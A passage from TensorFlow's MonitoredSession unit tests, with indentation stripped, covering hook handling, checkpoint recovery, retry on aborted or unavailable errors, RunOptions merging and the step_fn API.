self.assertEqual(1, session_creator.number_of_sessions_created)
self.assertFalse(session.should_stop())
c = constant_op.constant(0)
v = array_ops.identity(c)
def feed_step_fn(value):
def step_fn(step_context):
return step_context.run_with_hooks(fetches=v, feed_dict={c: value})
return step_fn
# The coordinator will not abort during this call, since it's the call
# number 0.
self.assertEqual(51, session.run_step_fn(feed_step_fn(51)))
self.assertFalse(session.should_stop())
# The coordinator will abort during the next call, since it's the call
# number 1.
self.assertEqual(42, session.run_step_fn(feed_step_fn(42)))
# The coordinator was asked to stop due to non-redeemable error. Training
# should stop and the session should not be recreated.
self.assertTrue(session.should_stop())
self.assertEqual(1, session_creator.number_of_sessions_created)
with self.assertRaises(errors_impl.UnknownError):
session.close()
@test_util.run_deprecated_v1
def test_recovery_from_session_getting_stuck_when_run_hooks(self):
with self.cached_session() as test_session:
session_creator = CountingSessionCreator(test_session)
session = monitored_session.MonitoredSession(
session_creator,
[FailTrainingAfterCoordinatorStopped(calls_before_stopping=2)])
self.assertEqual(1, session_creator.number_of_sessions_created)
self.assertFalse(session.should_stop())
c = constant_op.constant(0)
v = array_ops.identity(c)
def feed_step_fn(value):
def step_fn(step_context):
return step_context.run_with_hooks(fetches=v, feed_dict={c: value})
return step_fn
# Training will not fail, since it's the call number 0.
self.assertEqual(51, session.run_step_fn(feed_step_fn(51)))
self.assertFalse(session.should_stop())
# Training will fail during the next call, since it's the call
# number 1.
self.assertEqual(42, session.run_step_fn(feed_step_fn(42)))
# Even though the coordinator stopped which and training failed, the
# underlying session is recreated and training is to be continued.
self.assertFalse(session.should_stop())
self.assertEqual(2, session_creator.number_of_sessions_created)
def create_raw_session_with_failing_coordinator(self, session_creator, hook):
"""Return MonitoredSession that triggers coordinator failures."""
session = monitored_session.MonitoredSession(session_creator, [hook])
# We would like to test a situation where during fetches through the
# raw session, the coordinator fails with an exception. To do that, we
# are going to use (raw_session + StopCoordinatorWithException) hook
# combination that is stored in
# `MonitoredSession._RecoverableSession._CoordinatedSession._sess`
# at this point:
session._tf_sess = lambda: session._sess._sess._sess
# `run()` on such a session is equivalent to `run()` on the raw session
# with separate coordinator threads independently stopping with an
# exception.
return session
@test_util.run_deprecated_v1
def test_step_fn_recovery_from_coordinator_exception_with_raw_session(self):
with self.cached_session() as test_session:
session_creator = CountingSessionCreator(test_session)
session = self.create_raw_session_with_failing_coordinator(
session_creator,
StopCoordinatorWithException(calls_before_stopping=2))
self.assertEqual(1, session_creator.number_of_sessions_created)
self.assertFalse(session.should_stop())
c = constant_op.constant(0)
v = array_ops.identity(c)
def feed_step_fn(value):
def step_fn(step_context):
return step_context.session.run(fetches=v, feed_dict={c: value})
return step_fn
# The coordinator will not abort during this call, since it's the call
# number 0.
self.assertEqual(51, session.run_step_fn(feed_step_fn(51)))
self.assertFalse(session.should_stop())
# The coordinator will abort during the next call, since it's the call
# number 1.
self.assertEqual(42, session.run_step_fn(feed_step_fn(42)))
# Even though the coordinator was asked to stop, the underlying session is
# recreated and is to be continued.
self.assertFalse(session.should_stop())
self.assertEqual(2, session_creator.number_of_sessions_created)
@test_util.run_deprecated_v1
def test_recovery_from_non_preemption_in_coordinator_with_raw_session(self):
with self.cached_session() as test_session:
session_creator = CountingSessionCreator(test_session)
session = self.create_raw_session_with_failing_coordinator(
session_creator,
StopCoordinatorWithException(
calls_before_stopping=2,
exception_to_raise=errors_impl.UnknownError(
None, None, 'Some fatal exception inside the coordinator.')))
self.assertEqual(1, session_creator.number_of_sessions_created)
self.assertFalse(session.should_stop())
c = constant_op.constant(0)
v = array_ops.identity(c)
def feed_step_fn(value):
def step_fn(step_context):
return step_context.run_with_hooks(fetches=v, feed_dict={c: value})
return step_fn
# The coordinator will not abort during this call, since it's the call
# number 0.
self.assertEqual(51, session.run_step_fn(feed_step_fn(51)))
self.assertFalse(session.should_stop())
# The coordinator will abort during the next call, since it's the call
# number 1.
self.assertEqual(42, session.run_step_fn(feed_step_fn(42)))
# The coordinator was asked to stop due to non-redeemable error. Training
# should stop and the session should not be recreated.
self.assertTrue(session.should_stop())
self.assertEqual(1, session_creator.number_of_sessions_created)
with self.assertRaises(errors_impl.UnknownError):
session.close()
@test_util.run_deprecated_v1
def test_recovery_from_session_getting_stuck_with_raw_session(self):
with self.cached_session() as test_session:
session_creator = CountingSessionCreator(test_session)
session = self.create_raw_session_with_failing_coordinator(
session_creator,
FailTrainingAfterCoordinatorStopped(calls_before_stopping=2))
self.assertEqual(1, session_creator.number_of_sessions_created)
self.assertFalse(session.should_stop())
c = constant_op.constant(0)
v = array_ops.identity(c)
def feed_step_fn(value):
def step_fn(step_context):
return step_context.run_with_hooks(fetches=v, feed_dict={c: value})
return step_fn
# Training will not fail, since it's the call number 0.
self.assertEqual(51, session.run_step_fn(feed_step_fn(51)))
self.assertFalse(session.should_stop())
# Training will fail during the next call, since it's the call
# number 1.
self.assertEqual(42, session.run_step_fn(feed_step_fn(42)))
# Even though the coordinator stopped which and training failed, the
# underlying session is recreated and training is to be continued.
self.assertFalse(session.should_stop())
self.assertEqual(2, session_creator.number_of_sessions_created)
class FakeSession(monitored_session._WrappedSession):
def __init__(self, sess):
monitored_session._WrappedSession.__init__(self, sess)
self.args_called = {}
def run(self, fetches, **kwargs):
self.args_called = dict(kwargs)
# Call run only with fetches since we directly pass other arguments.
return monitored_session._WrappedSession.run(self, fetches)
class HookedSessionTest(test.TestCase):
"""Tests of _HookedSession."""
def testRunPassesAllArguments(self):
with ops.Graph().as_default(), session_lib.Session() as sess:
mock_run = FakeSession(sess)
mon_sess = monitored_session._HookedSession(sess=mock_run, hooks=[])
a_tensor = constant_op.constant([0], name='a_tensor')
self.evaluate(variables.global_variables_initializer())
output = mon_sess.run(fetches=a_tensor,
feed_dict='a_feed',
options='an_option',
run_metadata='a_metadata')
self.assertEqual(output, [0])
self.assertEqual(mock_run.args_called, {
'feed_dict': 'a_feed',
'options': 'an_option',
'run_metadata': 'a_metadata'
})
def testCallsHooksBeginEnd(self):
with ops.Graph().as_default(), session_lib.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
a_tensor = constant_op.constant([0], name='a_tensor')
self.evaluate(variables.global_variables_initializer())
mon_sess.run(a_tensor)
for hook in [mock_hook, mock_hook2]:
self.assertEqual(
hook.last_run_values,
session_run_hook.SessionRunValues(
results=None,
options=config_pb2.RunOptions(),
run_metadata=config_pb2.RunMetadata()))
self.assertEqual(hook.last_run_context.original_args,
session_run_hook.SessionRunArgs(a_tensor))
self.assertEqual(hook.last_run_context.session, sess)
self.assertEqual(hook.call_counter['begin'], 0)
self.assertEqual(hook.call_counter['after_create_session'], 0)
self.assertEqual(hook.call_counter['before_run'], 1)
self.assertEqual(hook.call_counter['after_run'], 1)
def testShouldStop(self):
with ops.Graph().as_default(), session_lib.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
constant_op.constant([0], name='a_tensor')
self.evaluate(variables.global_variables_initializer())
mon_sess.run(fetches='a_tensor')
self.assertFalse(mon_sess.should_stop())
mock_hook.should_stop = True
mon_sess.run(fetches='a_tensor')
self.assertTrue(mon_sess.should_stop())
def testFetchesHookRequests(self):
with ops.Graph().as_default(), session_lib.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
a_tensor = constant_op.constant([0], name='a_tensor')
another_tensor = constant_op.constant([5], name='another_tensor')
third_tensor = constant_op.constant([10], name='third_tensor')
mock_hook.request = session_run_hook.SessionRunArgs([another_tensor])
mock_hook2.request = session_run_hook.SessionRunArgs([third_tensor])
self.evaluate(variables.global_variables_initializer())
output = mon_sess.run(fetches=a_tensor)
self.assertEqual(output, [0])
self.assertEqual(mock_hook.last_run_values.results, [5])
self.assertEqual(mock_hook2.last_run_values.results, [10])
def testOnlyHooksHaveFeeds(self):
with ops.Graph().as_default(), session_lib.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
a_tensor = constant_op.constant([0], name='a_tensor')
b_tensor = constant_op.constant([0], name='b_tensor')
add_tensor = a_tensor + b_tensor
mock_hook.request = session_run_hook.SessionRunArgs(
None, feed_dict={a_tensor: [5]})
mock_hook2.request = session_run_hook.SessionRunArgs(
None, feed_dict={b_tensor: [10]})
self.evaluate(variables.global_variables_initializer())
self.assertEqual(mon_sess.run(fetches=add_tensor), [15])
def testBothHooksAndUserHaveFeeds(self):
with ops.Graph().as_default(), session_lib.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
a_tensor = constant_op.constant([0], name='a_tensor')
b_tensor = constant_op.constant([0], name='b_tensor')
c_tensor = constant_op.constant([0], name='c_tensor')
add_tensor = a_tensor + b_tensor + c_tensor
mock_hook.request = session_run_hook.SessionRunArgs(
None, feed_dict={a_tensor: [5]})
mock_hook2.request = session_run_hook.SessionRunArgs(
None, feed_dict={b_tensor: [10]})
self.evaluate(variables.global_variables_initializer())
feed_dict = {c_tensor: [20]}
self.assertEqual(
mon_sess.run(fetches=add_tensor, feed_dict=feed_dict), [35])
# User feed_dict should not be changed
self.assertEqual(len(feed_dict), 1)
def testHooksFeedConflicts(self):
with ops.Graph().as_default(), session_lib.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
a_tensor = constant_op.constant([0], name='a_tensor')
b_tensor = constant_op.constant([0], name='b_tensor')
add_tensor = a_tensor + b_tensor
mock_hook.request = session_run_hook.SessionRunArgs(
None, feed_dict={a_tensor: [5]})
mock_hook2.request = session_run_hook.SessionRunArgs(
None, feed_dict={a_tensor: [10]})
self.evaluate(variables.global_variables_initializer())
with self.assertRaisesRegexp(RuntimeError, 'Same tensor is fed'):
mon_sess.run(fetches=add_tensor)
def testHooksAndUserFeedConflicts(self):
with ops.Graph().as_default(), session_lib.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
a_tensor = constant_op.constant([0], name='a_tensor')
b_tensor = constant_op.constant([0], name='b_tensor')
add_tensor = a_tensor + b_tensor
mock_hook.request = session_run_hook.SessionRunArgs(
None, feed_dict={a_tensor: [5]})
mock_hook2.request = session_run_hook.SessionRunArgs(
None, feed_dict={b_tensor: [10]})
self.evaluate(variables.global_variables_initializer())
with self.assertRaisesRegexp(RuntimeError, 'Same tensor is fed'):
mon_sess.run(fetches=add_tensor, feed_dict={b_tensor: [10]})
class RaiseOnceAtCountN(session_run_hook.SessionRunHook):
"""Hook that raises an Exception at step N."""
def __init__(self, n, ex):
self.n = n
self.ex = ex
self.raised = False
def before_run(self, run_context):
# Raise the first time we reach step N.
self.n -= 1
if 0 == self.n and not self.raised:
self.raised = True
raise self.ex
return None
class RunOptionsMetadataHook(session_run_hook.SessionRunHook):
"""A hook that observes & optionally modifies RunOptions and RunMetadata."""
def __init__(self, trace_level, timeout_in_ms, output_partition_graphs,
debug_tensor_watch, report_tensor_allocations_upon_oom):
self._trace_level = trace_level
self._timeout_in_ms = timeout_in_ms
self._output_partition_graphs = output_partition_graphs
self._debug_tensor_watch = debug_tensor_watch
self._report_tensor_allocations_upon_oom = (
report_tensor_allocations_upon_oom)
self.run_options_list = []
self.run_metadata_list = []
def before_run(self, run_context):
options = config_pb2.RunOptions(
trace_level=self._trace_level,
timeout_in_ms=self._timeout_in_ms,
output_partition_graphs=self._output_partition_graphs,
report_tensor_allocations_upon_oom=self
._report_tensor_allocations_upon_oom)
options.debug_options.debug_tensor_watch_opts.extend(
[self._debug_tensor_watch])
return session_run_hook.SessionRunArgs(None, None, options=options)
def after_run(self, run_context, run_values):
self.run_options_list.append(run_values.options)
self.run_metadata_list.append(run_values.run_metadata)
class MonitoredSessionTest(test.TestCase):
"""MonitoredSession tests."""
def test_defaults(self):
with ops.Graph().as_default():
a_var = variables.VariableV1(0)
with monitored_session.MonitoredSession() as session:
self.assertEqual(0, session.run(a_var))
def test_last_step(self):
logdir = _test_dir(self.get_temp_dir(), 'test_last_step')
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
# Run till step 3 and save.
hooks = [basic_session_run_hooks.StopAtStepHook(last_step=3)]
with monitored_session.MonitoredSession(hooks=hooks) as session:
self.assertEqual(0, session.run(gstep))
self.assertFalse(session.should_stop())
self.assertEqual(1, session.run(do_step))
self.assertFalse(session.should_stop())
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
self.assertEqual(3, session.run(do_step))
self.assertTrue(session.should_stop())
save_path = saver_lib._get_saver_or_default().save(
session._coordinated_creator.tf_sess,
os.path.join(logdir, 'step-3'))
# Run till step 5 and save.
def load_ckpt(scaffold, sess):
scaffold.saver.restore(sess, save_path)
session_creator = monitored_session.ChiefSessionCreator(
monitored_session.Scaffold(init_fn=load_ckpt))
hooks = [basic_session_run_hooks.StopAtStepHook(last_step=5)]
with monitored_session.MonitoredSession(
hooks=hooks, session_creator=session_creator) as session:
self.assertEqual(3, session.run(gstep))
self.assertFalse(session.should_stop())
self.assertEqual(4, session.run(do_step))
self.assertFalse(session.should_stop())
self.assertEqual(5, session.run(do_step))
self.assertTrue(session.should_stop())
def test_num_steps(self):
logdir = _test_dir(self.get_temp_dir(), 'test_num_steps')
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
# Do 3 steps and save.
hooks = [basic_session_run_hooks.StopAtStepHook(num_steps=3)]
with monitored_session.MonitoredSession(hooks=hooks) as session:
session.run(do_step)
self.assertFalse(session.should_stop())
session.run(do_step)
self.assertFalse(session.should_stop())
session.run(do_step)
self.assertTrue(session.should_stop())
save_path = saver_lib._get_saver_or_default().save(
session._coordinated_creator.tf_sess,
os.path.join(logdir, 'step-3'))
# Restore and do 4 steps.
def load_ckpt(scaffold, sess):
scaffold.saver.restore(sess, save_path)
session_creator = monitored_session.ChiefSessionCreator(
scaffold=monitored_session.Scaffold(init_fn=load_ckpt))
hooks = [basic_session_run_hooks.StopAtStepHook(num_steps=4)]
with monitored_session.MonitoredSession(
hooks=hooks, session_creator=session_creator) as session:
self.assertEqual(4, session.run(do_step))
self.assertFalse(session.should_stop())
session.run(do_step)
self.assertFalse(session.should_stop())
session.run(do_step)
self.assertFalse(session.should_stop())
session.run(do_step)
self.assertTrue(session.should_stop())
# This set of tests, verifies the supervised session behavior when exceptions
# are raised next to the innermost session run() call.
@test_util.run_deprecated_v1
def test_recovery(self):
logdir = _test_dir(self.get_temp_dir(), 'test_recovery')
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
scaffold = monitored_session.Scaffold()
# Use a hook to save the model every 100 steps. It also saves it at
# the end.
hooks = [
basic_session_run_hooks.CheckpointSaverHook(
logdir, save_steps=1, scaffold=scaffold)
]
with monitored_session.MonitoredSession(
session_creator=monitored_session.ChiefSessionCreator(
scaffold, checkpoint_dir=logdir),
hooks=hooks) as session:
self.assertEqual(0, session.run(gstep))
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
# A restart will find the checkpoint and recover automatically.
with monitored_session.MonitoredSession(
session_creator=monitored_session.ChiefSessionCreator(
scaffold, checkpoint_dir=logdir)) as session:
self.assertEqual(2, session.run(gstep))
# A restart will find the checkpoint and recover automatically.
with monitored_session.MonitoredSession(
session_creator=monitored_session.ChiefSessionCreator(
scaffold,
checkpoint_filename_with_path=checkpoint_management.
latest_checkpoint(logdir))) as session:
self.assertEqual(2, session.run(gstep))
def test_retry_initialization_on_aborted_error(self):
# Tests that we silently retry on abort during initialization.
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
self.init_raised_aborted_error = False
def _init_fn(scaffold, session):
_, _ = scaffold, session
if not self.init_raised_aborted_error:
self.init_raised_aborted_error = True
raise errors_impl.AbortedError(None, None, 'Abort')
with monitored_session.MonitoredSession(
session_creator=monitored_session.ChiefSessionCreator(
scaffold=monitored_session.Scaffold(
init_fn=_init_fn))) as session:
self.assertFalse(session.should_stop())
self.assertEqual(0, session.run(gstep))
self.assertTrue(self.init_raised_aborted_error)
def _retry_test(self, ex):
# Tests that we silently retry on error. Note that this does not test
# recovery as we do not use a CheckpointSaver in this test.
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
hook = RaiseOnceAtCountN(4, ex)
with monitored_session.MonitoredSession(hooks=[hook]) as session:
self.assertEqual(0, session.run(gstep))
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
# Here at step 3, the hook triggers and raises AbortedError. The
# MonitoredSession automatically retries and restart from a freshly
# initialized session, so the step is back to 0 and running do_step
# moves it to 1.
self.assertEqual(1, session.run(do_step))
self.assertFalse(session.should_stop())
self.assertTrue(hook.raised)
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
def test_retry_on_aborted_error(self):
self._retry_test(errors_impl.AbortedError(None, None, 'Abort'))
def test_retry_on_unavailable_error(self):
self._retry_test(errors_impl.UnavailableError(None, None, 'Unavailable'))
def test_recover_and_retry_on_aborted_error(self):
# Tests that we silently retry and recover on abort. This test uses
# a CheckpointSaver to have something to recover from.
logdir = _test_dir(self.get_temp_dir(),
'test_recover_and_retry_on_aborted_error')
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
scaffold = monitored_session.Scaffold()
abort_hook = RaiseOnceAtCountN(
4, errors_impl.AbortedError(None, None, 'Abort'))
# Save after each step.
ckpt_hook = basic_session_run_hooks.CheckpointSaverHook(
logdir, save_steps=1, scaffold=scaffold)
hooks = [abort_hook, ckpt_hook]
with monitored_session.MonitoredSession(
session_creator=monitored_session.ChiefSessionCreator(
scaffold, checkpoint_dir=logdir),
hooks=hooks) as session:
self.assertEqual(0, session.run(gstep))
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
# Here at step 3, the hook triggers and raises AbortedError. The
# MonitoredSession automatically restores and retries.
self.assertEqual(3, session.run(do_step))
self.assertTrue(abort_hook.raised)
self.assertFalse(session.should_stop())
self.assertEqual(4, session.run(do_step))
self.assertFalse(session.should_stop())
def test_exit_cleanly_on_out_of_range_exception(self):
# Tests that we stop cleanly when OutOfRange is raised.
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
hook = RaiseOnceAtCountN(2, errors_impl.OutOfRangeError(None, None,
'EOI'))
session = monitored_session.MonitoredSession(hooks=[hook])
# session should cleanly exit from the context.
with session:
self.assertEqual(0, session.run(gstep))
self.assertFalse(session.should_stop())
# Here at step 1, the hook triggers and raises OutOfRange. The
# session should go into should_stop() mode. It should raise the
# exception. So next step should not be executed.
session.run(do_step)
self.assertTrue(False)
self.assertTrue(session.should_stop())
def test_exit_cleanly_on_stop_iteration_exception(self):
# Tests that we stop cleanly when OutOfRange is raised.
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
hook = RaiseOnceAtCountN(2, StopIteration)
session = monitored_session.MonitoredSession(hooks=[hook])
# session should cleanly exit from the context.
with session:
self.assertEqual(0, session.run(gstep))
self.assertFalse(session.should_stop())
# Here at step 1, the hook triggers and raises StopIteration. The
# session should go into should_stop() mode. It should raise the
# exception. So next step should not be executed.
session.run(do_step)
self.assertTrue(False)
self.assertTrue(session.should_stop())
def test_regular_exception_pass_through_run(self):
# Tests that regular exceptions just pass through a "with
# MonitoredSession" block and set the session in stop mode.
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
hook = RaiseOnceAtCountN(4, RuntimeError('regular exception'))
session = monitored_session.MonitoredSession(hooks=[hook])
with self.assertRaisesRegexp(RuntimeError, 'regular exception'):
with session:
self.assertEqual(0, session.run(gstep))
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
# This triggers the hook and raises the exception
session.run(do_step)
# We should not hit this
self.assertFalse(True)
self.assertTrue(hook.raised)
self.assertTrue(session.should_stop())
def test_regular_exception_reported_to_coord_pass_through_run(self):
# Tests that regular exceptions reported to the coordinator from a thread
# passes through a "run()" call within a "with MonitoredSession" block and
# set the session in stop mode.
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
session = monitored_session.MonitoredSession()
run_performed_without_error = False
with self.assertRaisesRegexp(RuntimeError, 'a thread wants to stop'):
with session:
self.assertEqual(0, session.run(gstep))
# Report an exception through the coordinator.
try:
raise RuntimeError('a thread wants to stop')
except RuntimeError as e:
session._coordinated_creator.coord.request_stop(e)
# Call run() which should perform normally.
self.assertEqual(0, session.run(gstep))
run_performed_without_error = True
self.assertTrue(run_performed_without_error)
def test_regular_exception_reported_to_coord_pass_through_return(self):
# Tests that regular exceptions reported to the coordinator from a thread
# passes through returning from a "with MonitoredSession" block and
# set the session in stop mode.
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
session = monitored_session.MonitoredSession()
with self.assertRaisesRegexp(RuntimeError, 'a thread wants to stop'):
with session:
self.assertEqual(0, session.run(gstep))
# Report an exception through the coordinator.
try:
raise RuntimeError('a thread wants to stop')
except RuntimeError as e:
session._coordinated_creator.coord.request_stop(e)
self.assertTrue(session.should_stop())
# This set of tests, verifies the session behavior when exceptions are raised
# from code inside a "with MonitoredSession:" context.
def test_stop_cleanly_when_no_exception_in_with_body(self):
# Tests that regular exceptions pass through
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
session = monitored_session.MonitoredSession()
with session:
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
# Should have closed.
self.assertTrue(session.should_stop())
self.assertTrue(session._is_closed())
def test_raises_regular_exceptions_in_with_body(self):
# Tests that regular exceptions in "with body" are seen outside.
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
session = monitored_session.MonitoredSession()
# We should see that exception.
with self.assertRaisesRegexp(RuntimeError, 'regular exception'):
with session:
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
# Will be visible outside the "with body".
raise RuntimeError('regular exception')
# Should have closed.
self.assertTrue(session.should_stop())
self.assertTrue(session._is_closed())
def test_graph(self):
with ops.Graph().as_default() as g:
with monitored_session.MonitoredSession() as session:
self.assertEqual(g, session.graph)
def test_graph_finalized_during_run_unfinalized_after_exit(self):
with ops.Graph().as_default() as g:
a_var = variables.VariableV1(0)
with monitored_session.MonitoredSession() as session:
self.assertEqual(0, session.run(a_var))
self.assertTrue(g.finalized)
self.assertFalse(g.finalized)
def test_keep_finalized_graph_as_finalized(self):
with ops.Graph().as_default() as g:
a_var = variables.VariableV1(0)
monitored_session.Scaffold().finalize()
with monitored_session.MonitoredSession() as session:
self.assertEqual(0, session.run(a_var))
self.assertTrue(g.finalized)
self.assertTrue(g.finalized)
def test_merge_run_options_from_hooks(self):
"""Test for rewriting RunOptions and observing RunMetadata with hooks."""
with ops.Graph().as_default():
my_const = constant_op.constant(42, name='my_const')
_ = constant_op.constant(24, name='my_const_2')
watch_a = debug_pb2.DebugTensorWatch(
node_name='my_const',
output_slot=0,
debug_ops=['DebugIdentity'],
debug_urls=[])
hook_a = RunOptionsMetadataHook(2, 30000, False, watch_a, False)
watch_b = debug_pb2.DebugTensorWatch(
node_name='my_const_2',
output_slot=0,
debug_ops=['DebugIdentity'],
debug_urls=[])
hook_b = RunOptionsMetadataHook(3, 60000, True, watch_b, True)
with monitored_session.MonitoredSession(
hooks=[hook_a, hook_b]) as session:
self.assertEqual(42, session.run(my_const))
# trace_level=3 should have overridden trace_level=2;
# timeout_in_ms=60000 should have overridden 30000;
# output_partition_graphs=True should have overridden False.
# The two debug tensor watches should have been merged.
self.assertEqual([
config_pb2.RunOptions(
trace_level=3,
timeout_in_ms=60000,
output_partition_graphs=True,
debug_options=debug_pb2.DebugOptions(
debug_tensor_watch_opts=[watch_a, watch_b]),
report_tensor_allocations_upon_oom=True),
], hook_b.run_options_list)
self.assertEqual(1, len(hook_b.run_metadata_list))
self.assertTrue(
isinstance(hook_b.run_metadata_list[0], config_pb2.RunMetadata))
self.assertGreater(len(hook_b.run_metadata_list[0].partition_graphs), 0)
def test_merge_caller_and_hook_run_options(self):
"""Test that RunOptions from caller and hooks can be merged properly."""
with ops.Graph().as_default():
my_const = constant_op.constant(42, name='my_const')
_ = constant_op.constant(24, name='my_const_2')
hook_watch = debug_pb2.DebugTensorWatch(
node_name='my_const_2',
output_slot=0,
debug_ops=['DebugIdentity'],
debug_urls=[])
hook = RunOptionsMetadataHook(2, 60000, False, hook_watch, False)
with monitored_session.MonitoredSession(hooks=[hook]) as session:
caller_watch = debug_pb2.DebugTensorWatch(
node_name='my_const',
output_slot=0,
debug_ops=['DebugIdentity'],
debug_urls=[])
caller_options = config_pb2.RunOptions(
trace_level=3,
timeout_in_ms=30000,
output_partition_graphs=True,
report_tensor_allocations_upon_oom=True)
caller_options.debug_options.debug_tensor_watch_opts.extend(
[caller_watch])
self.assertEqual(42, session.run(my_const, options=caller_options))
# trace_level=3 from the caller should override 2 from the hook.
# timeout_in_ms=60000 from the hook should override from the caller.
# output_partition_graph=True from the caller should override False
# from the hook.
# The two debug watches from the caller and the hook should be merged,
# in that order.
self.assertEqual([
config_pb2.RunOptions(
trace_level=3,
timeout_in_ms=60000,
output_partition_graphs=True,
debug_options=debug_pb2.DebugOptions(
debug_tensor_watch_opts=[caller_watch, hook_watch]),
report_tensor_allocations_upon_oom=True),
], hook.run_options_list)
self.assertEqual(1, len(hook.run_metadata_list))
self.assertTrue(
isinstance(hook.run_metadata_list[0], config_pb2.RunMetadata))
self.assertGreater(len(hook.run_metadata_list[0].partition_graphs), 0)
@test_util.run_deprecated_v1
def test_with_statement_and_close(self):
# Test case for https://github.com/tensorflow/tensorflow/issues/12224
# where close() inside the with should have a better error message.
with self.assertRaisesRegexp(RuntimeError, 'Session is already closed'):
with monitored_session.MonitoredSession() as session:
session.close()
def test_step_fn_example(self):
with ops.Graph().as_default():
c = array_ops.placeholder(dtypes.float32)
v = array_ops.identity(c)
def step_fn(step_context):
value = step_context.run_with_hooks(fetches=v, feed_dict={c: 3.2})
return value
with monitored_session.MonitoredSession() as session:
self.assertNear(3.2, session.run_step_fn(step_fn), 0.1)
def test_step_function_stops(self):
with ops.Graph().as_default():
def step_fn(step_context):
step_context.request_stop()
with monitored_session.MonitoredSession() as session:
self.assertEqual(None, session.run_step_fn(step_fn))
self.assertTrue(session.should_stop())
def test_step_request_stop_without_a_with_block(self):
with ops.Graph().as_default():
was_stop_iteration_raised = False
def step_fn(step_context):
step_context.request_stop()
session = monitored_session.MonitoredSession()
try:
self.assertEqual(None, session.run_step_fn(step_fn))
except StopIteration:
was_stop_iteration_raised = True
self.assertTrue(was_stop_iteration_raised)
self.assertFalse(session.should_stop())
def test_step_request_stop_in_a_loop(self):
with ops.Graph().as_default():
def step_fn(step_context):
step_context.request_stop()
with monitored_session.MonitoredSession() as session:
while not session.should_stop():
_ = session.run_step_fn(step_fn)
self.fail('An exception should be raised on the line above.')
def test_step_request_stop_with_returning_a_type(self):
with ops.Graph().as_default():
def step_fn(step_context):
del step_context
return 'a type'
with monitored_session.MonitoredSession() as session:
self.assertEqual('a type', session.run_step_fn(step_fn))
def test_step_with_extra_arguments(self):
with ops.Graph().as_default():
def step_fn(step_context, extra_foo):
del step_context, extra_foo
with monitored_session.MonitoredSession() as session:
with self.assertRaisesRegexp(
ValueError,
'`step_fn` may either have one `step_context` argument'):
self.assertEqual(None, session.run_step_fn(step_fn))
def test_step_fn_belongs_to_a_class(self):
with ops.Graph().as_default():
c = array_ops.placeholder(dtypes.float32)
v = array_ops.identity(c)
class Model(object):
def step_fn(self, step_context):
return step_context.run_with_hooks(fetches=v, feed_dict={c: 3.2})
with monitored_session.MonitoredSession() as session:
model = Model()
self.assertNear(3.2, session.run_step_fn(model.step_fn), 0.1)
def test_step_fn_belongs_to_a_class_and_has_extra_methods(self):
with ops.Graph().as_default():
class Model(object):
def step_fn(self, step_context, extra_foo):
del step_context, extra_foo
with monitored_session.MonitoredSession() as session:
with self.assertRaisesRegexp(
ValueError,
'`step_fn` may either have one `step_context` argument'):
model = Model()
self.assertEqual(None, session.run_step_fn(model.step_fn))
def test_step_fn_with_hooks(self):
with ops.Graph().as_default():
var = resource_variable_ops.ResourceVariable(0.0)
# This test highlights the interaction of hooks with
# `Monitoredsession.run_step_fn`. The order of execution of operations
# below is:
# 0. stage_0
# 1. stage_1_0 or stage_1_1 in an undefined order
# 2. stage_2
stage_0 = state_ops.assign_add(var, 0.3)
stage_1_0 = state_ops.assign_add(var, 0.7)
# The order of `stage_1_0` and `stage_1_1` is undefined by
# `MonitoredSession`, but we should be able to assert when both of them
# are complete. To obtain a consistent result of adding two different
# constants to `var`, we rely on a control dependency and
# `ResourceVariable`. Otherwise, it is possible that one of the
# additions overwrites the result of the other addition.
with ops.control_dependencies([stage_1_0]):
stage_1_1 = state_ops.assign_add(var, 0.5)
